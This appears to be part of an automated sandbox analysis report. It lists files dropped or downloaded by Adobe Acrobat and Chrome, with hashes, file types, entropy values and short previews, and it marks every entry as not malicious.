                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):192
                                            Entropy (8bit):2.7485180290352824
                                            Encrypted:false
                                            SSDEEP:3:kkFklD5VhfllXlE/HT8kD7llXNNX8RolJuRdxLlGB9lQRYwpDdt:kKk6T86ldNMa8RdWBwRd
                                            MD5:6ADD0ABF0640508670C48AC3EACFD113
                                            SHA1:4D037AC9C41C495A515D7564AA9B8BB9088C7C41
                                            SHA-256:24146BCD816EFF0A546D3EC9CCE992569644F0363BB3B13E8575C1064D6EBCE8
                                            SHA-512:A81CC123073E2DCF07B1714360847C98E80FAC0BCECA8D682B25F8DD632D756D92E36E8564D79220C5456BB29099FF1B268FB5D4FB8D1A41B826358E7F6CDC0B
                                            Malicious:false
                                            Preview:p...... ...........w6..(....................................................... ..........W....}...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):328
                                            Entropy (8bit):3.244101792565376
                                            Encrypted:false
                                            SSDEEP:6:kKp5F9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:bsDImsLNkPlE99SNxAhUe/3
                                            MD5:618A1CBA4852C992A4908D21A401A998
                                            SHA1:57BB3FCF4B692BDC7499BF88A8B3468D884CF306
                                            SHA-256:86EA27DC69BCA66D2C2B8625A3625CF44E32103AD2B0852701D35EB32A66048F
                                            SHA-512:6756B44075C26CBC0C9E03555489DDA6B42B47FA33A25EAC9D58B5517E09D88285E34DA21E6BA513C035DBDB09857D76CF049374479D91A5700DEAB4995B4C4E
                                            Malicious:false
                                            Preview:p...... ..........{.w6..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):247234
                                            Entropy (8bit):3.3245480448633247
                                            Encrypted:false
                                            SSDEEP:1536:mKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqUrRo+RQn:TPClJ/3AYvYwglFo+RQn
                                            MD5:F7B75939ED43CD13BC5FA5A7E72C9C16
                                            SHA1:2FB9185CFEB8001598A301C83ECA9948420007ED
                                            SHA-256:2D50A4E5C21D7154373C0DF9DAF523FF54E48551510828BDD08D0E3B24125055
                                            SHA-512:E7AB73FFC3402C06D67410C52140A801A7FCBA9B8D248F6C6A069A31FB14437B347BB2973DE361B395E49E50A0A11E515F3E9EC1A73B568421B64E059B883758
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):4
                                            Entropy (8bit):0.8112781244591328
                                            Encrypted:false
                                            SSDEEP:3:e:e
                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                            Malicious:false
                                            Preview:....
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):2145
                                            Entropy (8bit):5.067471156048809
                                            Encrypted:false
                                            SSDEEP:48:YY2sL0/EY0bMSlMtCM5mMOpiMAW0MretMSMmkaMY:uv/SYtt55V6AWLre6JmkhY
                                            MD5:52BD1ED0D7D167085D2380579118D9D2
                                            SHA1:A11FAB7413922FF0EB3026152F439CDFA4CDA23F
                                            SHA-256:EF1A73B80C769F48E40AF91721E3DEEFD78BC53589F7AAD5B6687FB8C7E40C10
                                            SHA-512:58481A8A06CD4DCA06403F00154F37896666E6EE8ED16DCA6706F7303DD6D07D7D27F74C35381BFD59754CF599370FFDB178F52118B623DB7A9602090521042E
                                            Malicious:false
                                            Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1731576491000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"7c2ad79e375e3ea39f82a389e8a5841f","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696420882000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner"
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):1.1879580958031168
                                            Encrypted:false
                                            SSDEEP:48:TGufl2GL7msEHUUUUUUUUMOSvR9H9vxFGiDIAEkGVvpwI:lNVmswUUUUUUUUh+FGSItF
                                            MD5:A5A13D8B2C2A2913D632B64A5680A01D
                                            SHA1:F7D16565CE316FC4F8DCEA6B145E3EE4B8C25519
                                            SHA-256:1B4C65043B6101D5B2299DF40806B9DAD904B3701CBCE58C32FDF877465A857D
                                            SHA-512:F0ABAF4454F75E89D499C17A81EC7EC743F5D549FA2AF198163EDCD51090A7AE060CEBC8AF6A322AEBAB80AB46E9B4C07C35F443BA436970D3CFFD906EB65CEF
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite Rollback Journal
                                            Category:dropped
                                            Size (bytes):8720
                                            Entropy (8bit):1.6029142780577297
                                            Encrypted:false
                                            SSDEEP:48:7MXKUUUUUUUUUUMcvR9H9vxFGiDIAEkGVvDYqFl2GL7msr:7VUUUUUUUUUUNFGSIt2KVmsr
                                            MD5:F2CB068F33F08FADA49E3AAF0769E268
                                            SHA1:D73DCB91F93890273B73D1146D95BBBE02480059
                                            SHA-256:3F45EB3D0EA20C7F86E7FE4BA793CDBE1E632A8DAA26AF04C5195300C1DCD9A2
                                            SHA-512:9615E516621223F4C419F312037E0BE01BDF9A1183EC9915C80B5D8975E9B024061C00F20EA504C70220BE842555E2E74A845FA86090615B853D8DEA8AE7A39F
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):66726
                                            Entropy (8bit):5.392739213842091
                                            Encrypted:false
                                            SSDEEP:768:RNOpblrU6TBH44ADKZEgcfjwrNYD+9EGwSsd0Cts1I5lEYyu:6a6TZ44ADEcLwrNYq97CuK
                                            MD5:02C10E56BA966DE5DBB89F2794240ADD
                                            SHA1:37C50F17AD58A713A2DA4F7F8EB41F8B84755E49
                                            SHA-256:B4CDBCC5E299D7009F1244D7132F514BE50E79A959AEB4EB88813D88C22FCE9F
                                            SHA-512:1EEB68C1E368E6360123C08D720B3479F8CB07AE4E774BBE79F939775119EB147F373D9FE7C22061D31A798E14CB91B64204DA7E6C4C3578CC5B4FA839A3DBB4
                                            Malicious:false
                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):246
                                            Entropy (8bit):3.5085442896850614
                                            Encrypted:false
                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84WBlxYle:Qw946cPbiOxDlbYnuRKhw
                                            MD5:28A5068381F4AAAD98506021F1F7AAA4
                                            SHA1:4FD133C11B7B86050E71CBA2B7D32B6BFC5EFEE2
                                            SHA-256:EFA79EA5ED8BAD9D0DBE8B35C47A5B98AF5F7E83BED2C450476A38959753B4E9
                                            SHA-512:50F77C4DB9A648C6BAA37B0290FBA4F1C72233E7ED237A067489A98117265BF6D8907FEFD4BAA69CCBC087F2658F08E5528E26454C23B4EB505C2E10E204F993
                                            Malicious:false
                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.4./.1.1./.2.0.2.4. . .0.4.:.2.8.:.1.6. .=.=.=.....
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                            Category:dropped
                                            Size (bytes):144514
                                            Entropy (8bit):7.992637131260696
                                            Encrypted:true
                                            SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                            MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                            SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                            SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                            SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text, with very long lines (393)
                                            Category:dropped
                                            Size (bytes):16525
                                            Entropy (8bit):5.345946398610936
                                            Encrypted:false
                                            SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                            MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                            SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                            SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                            SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                            Malicious:false
                                            Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):15114
                                            Entropy (8bit):5.346523847564553
                                            Encrypted:false
                                            SSDEEP:384:ng+gogrgwg6gxzW5kABki/J3faNzvOisd3BAkOqV3lLHVTWuuh3CW9Piuz3eGf+I:1ii
                                            MD5:83176765DB7DD6EC24400E010365FD26
                                            SHA1:7EA56C5B0AF03E150F72156B3E21C9DF4083D67D
                                            SHA-256:53C408131A752BF188E10C5E8D430759B10810B87078F20BB014D67CD757157A
                                            SHA-512:A89F959C175077BB824631F21E589D7B2FD891909704AA9E14A8FA0FCF183D2F1CF301D289F0D37AD1F29C9CC1F665C42AC5068A80EF3D368D22CACA90EF0B51
                                            Malicious:false
                                            Preview:SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_NglAppLib Description="SetConf
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):29752
                                            Entropy (8bit):5.384786635164464
                                            Encrypted:false
                                            SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rh:N
                                            MD5:AF3297CD40B6C1E19B8FB60E584C8D4F
                                            SHA1:731FBAB663AC82E1757F761EF585F5D931882394
                                            SHA-256:958991C37158E19280928629E7DDB410549483A8CBD6F10FF5702FA33037A0D7
                                            SHA-512:71E3DFFAE893CFE57CD60700B6388B93A4655F62622709B82CD4D97D0C2C1215005A646CEE0F268CA55F3F22E8E0EEE008DF9DD481AAD1D669450A84660649DD
                                            Malicious:false
                                            Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                            Category:dropped
                                            Size (bytes):1419751
                                            Entropy (8bit):7.976496077007677
                                            Encrypted:false
                                            SSDEEP:24576:/xA7owWLcGZtwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLcGZtwZGk3mlind9i4ufFXpAXkru
                                            MD5:A46246FAEAB95D87F5B4FE236C2B3D3E
                                            SHA1:7F018DB9238A63FEAD8D11A92297E7366058A75A
                                            SHA-256:7E822FECC47177C5A7F4C250E7D53509D104DE68B0D0CE9445877B508400988E
                                            SHA-512:8AAB79958BF39F014FBA7F69287FE0C357746E63FA3482DE3231BDF4A97B964A0815DAF7BFE9751C55BA6BE618E0A964CEB23FC30B4FA9DFEB284F42EBA897BF
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                            Category:dropped
                                            Size (bytes):1407294
                                            Entropy (8bit):7.97605879016224
                                            Encrypted:false
                                            SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                            MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                            SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                            SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                            SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                            Category:dropped
                                            Size (bytes):386528
                                            Entropy (8bit):7.9736851559892425
                                            Encrypted:false
                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                            Category:dropped
                                            Size (bytes):758601
                                            Entropy (8bit):7.98639316555857
                                            Encrypted:false
                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                            MD5:3A49135134665364308390AC398006F1
                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                            Malicious:false
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):24
                                            Entropy (8bit):3.66829583405449
                                            Encrypted:false
                                            SSDEEP:3:So6FwHn:So6FwHn
                                            MD5:DD4A3BD8B9FF61628346391EA9987E1D
                                            SHA1:474076C122CACAAF112469FC62976BB69187AA2B
                                            SHA-256:7C22C759CA704106556BBC4FC10B7F53404CA1F8B40F01038D3F7C4B8183F486
                                            SHA-512:FDAF3D9F8072ED7DE9B2528376C10E3C3FDBEA74347710A4795BECF23C6577B3582B2E89D3C04EF0523C98FE0A46F2AF3629490701A20B848C63BA7B26579491
                                            Malicious:false
                                            Preview:<</Settings [/c <<>>].>>
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):98682
                                            Entropy (8bit):6.445287254681573
                                            Encrypted:false
                                            SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                            MD5:7113425405A05E110DC458BBF93F608A
                                            SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                            SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                            SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                            Malicious:false
                                            Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):737
                                            Entropy (8bit):7.501268097735403
                                            Encrypted:false
                                            SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                            MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                            SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                            SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                            SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                            Malicious:false
                                            Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:Unicode text, UTF-8 (with BOM) text
                                            Category:downloaded
                                            Size (bytes):23427
                                            Entropy (8bit):5.112735417225198
                                            Encrypted:false
                                            SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                            MD5:BA0537E9574725096AF97C27D7E54F76
                                            SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                            SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                            SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                            Malicious:false
                                            URL:https://www.w3schools.com/w3css/4/w3.css
                                            Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:SVG Scalable Vector Graphics image
                                            Category:downloaded
                                            Size (bytes):1636
                                            Entropy (8bit):4.214613323368661
                                            Encrypted:false
                                            SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                            MD5:F7AB697E65B83CE9870A4736085DEEEC
                                            SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                            SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                            SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                            Malicious:false
                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
